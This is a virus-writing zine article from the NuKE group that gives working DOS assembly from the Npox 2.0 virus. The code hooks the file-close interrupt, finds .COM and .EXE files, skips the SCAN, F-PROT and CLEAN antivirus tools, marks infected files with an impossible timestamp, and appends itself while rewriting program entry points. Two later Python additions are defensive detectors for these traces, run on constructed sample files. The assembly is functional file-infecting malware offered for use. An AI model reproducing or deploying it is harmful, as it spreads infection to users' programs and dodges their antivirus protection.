Infection on Closing
By: Rock Steady / NuKE


This routine goes out to a few people that had trouble hacking this routine themselves... I kinda like it, it's my very OWN, no Dark Avenger hack, it is VERY straightforward, and kinda simple... I was not going to put this here, but since I `Promised' people and left them hanging with `Wait for IJ#5', I guess I owed you it... huh?

Again, this code comes right out of Npox 2.0. It's neat, simple, fast, cool, and it works; Npox is your example. I heard MANY MANY complaints about other `Virus writing guides', meaning they explained the code but sometimes the author himself never checked if the code was good, as he may have modified it and not tested it... or whatever reason... Anyhow

Okay, once you've intercepted the Int21h/ah=3Dh function, you make it jump here...

                                                                              
closing_file:   cmp     bx,0h                   ;Handle=0?                    
                je      closing_bye             ;if equal leave               
                cmp     bx,4h                   ;Handle > 4?
                ja      close_cont              ;if YES, then JUMP!
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us     

The whole point of the above code is that DOS contains 5 predefined handles, 0 -> 4. Basically, those handles are the NULL, CON, AUX COMx, LPTx handles... So we surely do not need to continue once we encounter one of those...

                                                                              
close_cont:     push    ax                                                    
                push    bx                                                    
                push    cx                                                    
                push    dx                                                    
                push    di                                                    
                push    ds                                                    
                push    es                                                    
                push    bp                                                    

Our biggest problem is: how do we know if this file is a .COM or .EXE or simply just another dumb data file? We need this info before we can try to infect it... We do this by getting DOS's "List of Lists"; this will give us all the INFO needed on the File Handle Number we have in BX! And we do that like so...

                                                                              
                push    bx                      ;Save File Handle             
                mov     ax,1220h                ;Get the Job File Table       
                int     2fh                     ;(JFT)                        

This will give us the JFT for the CURRENT file handle in BX, which is given thru ES:DI. Then we use this information to get the address of the System File Table!

                                                                              
                mov     ax,1216h        ;Get System File Table (List)         
                mov     bl,es:[di]      ;system file table entry number       
                int     2fh                                                   
                pop     bx              ;restore the Handle                   
                                                                              
                add     di,0011h                                              
                mov     byte ptr es:[di-0fh],02h                              
                                                                              
                add     di,0017h                ;Jump to the ASCIIZ string    
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?           
                jne     closing_next_try        ;Next cmp...                  
                cmp     byte ptr es:[di+2h],'M'                               
                jne     pre_exit                ;Nope exit                    
                jmp     closing_cunt3           ;.COM file continue           
                                                                              
closing_next_try:                                                             
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?           
                jne     pre_exit                ;No, exit                     
                cmp     byte ptr es:[di+2h],'E'                               
                jne     pre_exit                ;No, exit                     

If it is an .EXE file, check if it is F-PROT or SCAN. See, F-PROT, when started up, opens itself, closes itself, etc... so that a dumb virus will infect it, and then the CRC value changes and F-PROT screams... haha... Fuck-Prot! is the name...

                                                                              
closing_cunt:   cmp     word ptr es:[di-8],'CS'                               
                jnz     closing_cunt1              ;SCAN                      
                cmp     word ptr es:[di-6],'NA'                               
                jz      pre_exit                                              
                                                                              
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                               
                jnz     closing_cunt2              ;F-PROT                    
                cmp     word ptr es:[di-6],'RP'                               
                jz      pre_exit                                              
                                                                              
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                               
                jnz     closing_cunt3                                         
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                     
                jnz     closing_cunt3                                         
                                                                              
pre_exit:       jmp     closing_nogood                                        

The REST is pretty much the EXACT same as `how' you'd infect a normal file, I'll leave it for you to go thru it... The hardest part is OVER! The only tricky part is the ending... Remember to close the file and then do an IRET; you don't leave control to DOS, as you only needed to close it, so do it... OR DON'T close it and return to DOS, as DOS will close it, just DON'T CLOSE IT TWICE!!!!

                                                                              
closing_cunt3:  mov     ax,5700h                        ;Get file Time        
                call    calldos21                                             
                mov     al,cl                                                 
                or      cl,1fh                                                
                dec     cx                              ;60 Seconds           
                xor     al,cl                                                 
                jz      closing_nogood                  ;Already infected     
                                                                              
                push    cs                                                    
                pop     ds                                                    
                mov     word ptr ds:[old_time],cx       ;Save time            
                mov     word ptr ds:[old_date],dx                             
                                                                              
                mov     ax,4200h                        ;jmp beginning of     
                xor     cx,cx                           ;file...              
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                mov     ah,3fh                          ;Get first 1b byte    
                mov     cx,1Bh                                                
                mov     dx,offset buffer                                      
                call    calldos21                                             
                                                                              
                jc      closing_no_good                 ;error?               
                mov     ax,4202h                        ;Jmp to the EOF       
                xor     cx,cx                                                 
                xor     dx,dx                                                 
                call    calldos21                                             
                                                                              
                jc      closing_no_good                                       
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?           
                je      closing_exe                     ;Yupe then jmp        
                mov     cx,ax                                                 
                sub     cx,3h                                                 
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the      
                call    infect_me                        ;jmp for .com        
                                                                              
                jc      closing_no_good                                       
                mov     ah,40h                          ;Write it to file     
                mov     dx,offset jump_address                                
                mov     cx,3h                                                 
                call    calldos21                                             
closing_no_good:                                                              
                mov     cx,word ptr ds:[old_time]       ;Save file time       
                mov     dx,word ptr ds:[old_date]       ;& date               
                mov     ax,5701h                                              
                call    calldos21                                             
                                                                              
closing_nogood: pop     bp                                                    
                pop     es                                                    
                pop     ds                                                    
                pop     di                                                    
                pop     dx                                                    
                pop     cx                                                    
                pop     bx                                                    
                pop     ax                                                    
                jmp     dword ptr cs:[int21]                                  
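
The already-infected check above doubles as a detection signature: the routine stamps the file time with a seconds field of 30, which decodes to an impossible 60 seconds. As an added example (not part of the original article or of Npox), this Python code walks 32-byte FAT directory entries and flags .COM/.EXE files carrying such a timestamp; the sample directory and the `make_entry` helper are constructed for the demo.

```python
import struct

def decode_dos_time(word):
    """Split a packed DOS time word into (hours, minutes, seconds)."""
    return (word >> 11) & 0x1F, (word >> 5) & 0x3F, (word & 0x1F) * 2

def make_entry(name, ext, attr, hms):
    """Build one constructed 32-byte FAT directory entry (sample data only)."""
    h, m, s = hms
    entry = bytearray(32)
    entry[0:11] = name.ljust(8).encode() + ext.ljust(3).encode()
    entry[11] = attr
    struct.pack_into("<H", entry, 0x16, (h << 11) | (m << 5) | (s // 2))
    return bytes(entry)

def scan_directory(raw):
    """Return [(filename, 'hh:mm:ss')] for executables whose seconds are impossible."""
    hits = []
    for off in range(0, len(raw) - 31, 32):
        entry = raw[off:off + 32]
        if entry[0] == 0x00:                 # 00h marks the end of the directory
            break
        if entry[0] == 0xE5 or entry[11] & 0x18:
            continue                         # deleted entry, volume label or subdirectory
        ext = entry[8:11].decode("ascii", "replace").rstrip()
        if ext not in ("COM", "EXE"):
            continue
        (word,) = struct.unpack_from("<H", entry, 0x16)   # time word at offset 16h
        h, m, s = decode_dos_time(word)
        if s > 58:                           # field values 30 and 31 decode to 60 and 62
            name = entry[0:8].decode("ascii", "replace").rstrip()
            hits.append((f"{name}.{ext}", f"{h:02d}:{m:02d}:{s:02d}"))
    return hits

# Constructed sample directory: two suspicious executables among normal entries.
SAMPLE_DIR = b"".join([
    make_entry("COMMAND", "COM", 0x20, (12, 0, 0)),
    make_entry("GAME", "EXE", 0x20, (9, 41, 60)),    # the value this routine stamps
    make_entry("README", "TXT", 0x20, (9, 41, 60)),  # not an executable, ignored
    make_entry("EDIT", "COM", 0x20, (23, 59, 58)),   # highest legal seconds value
    make_entry("TOOLS", "", 0x10, (1, 2, 60)),       # subdirectory, ignored
    make_entry("UTIL", "COM", 0x20, (0, 5, 62)),     # other impossible value
])

if __name__ == "__main__":
    for name, stamp in scan_directory(SAMPLE_DIR):
        print(f"{name}: impossible timestamp {stamp}")
```
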

As you can see at closing_nogood above, we DIDN'T close the file, so we leave DOS to do it. The code below is for infecting .EXEs...

                                                                              
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original    
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP        
                mov     cx,word ptr cs:[buffer+22]                            
                mov     word ptr cs:[exe_cs],cx                               
                mov     cx,word ptr cs:[buffer+16]                            
                mov     word ptr cs:[exe_sp],cx                               
                mov     cx,word ptr cs:[buffer+14]                            
                mov     word ptr cs:[exe_ss],cx                               
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                mov     word ptr cs:[vir_cs],dx                               
                push    ax                                                    
                push    dx                                                    
                call    infect_me                                             
                pop     dx                                                    
                pop     ax                                                    
                mov     word ptr cs:[buffer+22],dx                            
                mov     word ptr cs:[buffer+20],ax                            
                pop     dx                                                    
                pop     ax                                                    
                jc      closing_no_good                                       
                                                                              
                add     ax,virus_size                                         
                adc     dx,0                                                  
                                                                              
                push    ax                                                    
                push    dx                                                    
                call    multiply                                              
                sub     dx,word ptr cs:[buffer+8]                             
                add     ax,40h                                                
                mov     word ptr cs:[buffer+14],dx                            
                mov     word ptr cs:[buffer+16],ax                            
                pop     dx                                                    
                pop     ax                                                    
                                                                              
                push    bx                                                    
                push    cx                                                    
                mov     cl,7                                                  
                shl     dx,cl                                                 
                                                                              
                mov     bx,ax                                                 
                mov     cl,9                                                  
                shr     bx,cl                                                 
                                                                              
                add     dx,bx                                                 
                and     ax,1FFh                                               
                jz      close_split                                           
                inc     dx                                                    
close_split:    pop     cx                                                    
                pop     bx                                                    
                                                                              
                mov     word ptr cs:[buffer+2],ax                             
                mov     word ptr cs:[buffer+4],dx                             
                                                                              
                mov     ah,40h                                                
                mov     dx,offset ds:[buffer]                                 
                mov     cx,20h                                                
                call    calldos21                                             
                                                                              
closing_over:   jmp     closing_no_good                                       
                                                                              
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
;                   Infection Routine...                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
infect_me       proc                                                          
                mov     ah,40h                                                
                mov     dx,offset init_virus                                  
                mov     cx,virus_size                                         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Error Split          
                mov     ax,4200h                                              
                xor     cx,cx                           ;Pointer back to      
                xor     dx,dx                           ;Top of file!         
                call    calldos21                                             
                                                                              
                jc      exit_error                      ;Split Dude...        
                clc                                     ;Clear carry flag     
                ret                                                           
exit_error:                                                                   
                stc                                     ;Set carry flag       
                ret                                                           
infect_me       endp                                                          
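
Both branches above leave the same structural trace: execution now starts at what used to be the end of the file. An added Python example (not code from the article or from Npox) that computes the entry offset of a .COM or MZ file and reports when it falls in the last bytes of the file. The E9h near-jump opcode, the 4096-byte `tail` threshold and the sample files are assumptions, and a hit is a triage hint, since some legitimate programs also start near their end.

```python
import struct

def com_jump_target(data):
    """File offset a leading near JMP (E9 rel16) lands on, or None."""
    if len(data) < 3 or data[0] != 0xE9:
        return None
    (rel,) = struct.unpack_from("<H", data, 1)
    return (3 + rel) & 0xFFFF            # displacement counts from the end of the jump

def exe_entry(data):
    """Return (entry_file_offset, image_size) from an MZ header, or None."""
    if len(data) < 0x1C or data[:2] not in (b"MZ", b"ZM"):
        return None
    last, pages, _, hdr_paras = struct.unpack_from("<4H", data, 2)
    ip, cs = struct.unpack_from("<2H", data, 0x14)   # header offsets 14h and 16h
    size = pages * 512 if last == 0 else (pages - 1) * 512 + last
    return hdr_paras * 16 + ((cs * 16 + ip) & 0xFFFFF), size

def entry_in_tail(data, tail=4096):
    """True when execution starts inside the last `tail` bytes (assumed threshold)."""
    if data[:2] in (b"MZ", b"ZM"):
        entry, size = exe_entry(data) or (None, 0)
        end = min(size, len(data))
    else:
        entry, end = com_jump_target(data), len(data)
    return entry is not None and entry < end and end - entry <= tail

def make_exe(load_size, cs, ip):
    """Constructed MZ file: 32-byte header plus a zero-filled load module."""
    total = 32 + load_size
    hdr = bytearray(32)
    hdr[0:2] = b"MZ"
    struct.pack_into("<4H", hdr, 2, total % 512, -(-total // 512), 0, 2)
    struct.pack_into("<2H", hdr, 0x14, ip, cs)
    return bytes(hdr) + bytes(load_size)

# Constructed samples: a 20000-byte .COM and a 30000-byte load module, each
# either untouched or with 1500 bytes appended and the entry moved to the old EOF.
CLEAN_COM = b"\xE9" + struct.pack("<H", 0x100 - 3) + bytes(19997)
TAIL_COM = b"\xE9" + struct.pack("<H", 20000 - 3) + bytes(19997) + bytes(1500)
CLEAN_EXE = make_exe(30000, 0, 0x10)
TAIL_EXE = make_exe(31500, 30000 // 16, 0)

if __name__ == "__main__":
    for label, blob in [("CLEAN_COM", CLEAN_COM), ("TAIL_COM", TAIL_COM),
                        ("CLEAN_EXE", CLEAN_EXE), ("TAIL_EXE", TAIL_EXE)]:
        print(label, "entry in tail" if entry_in_tail(blob) else "ok")
```
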

Desperation/MOB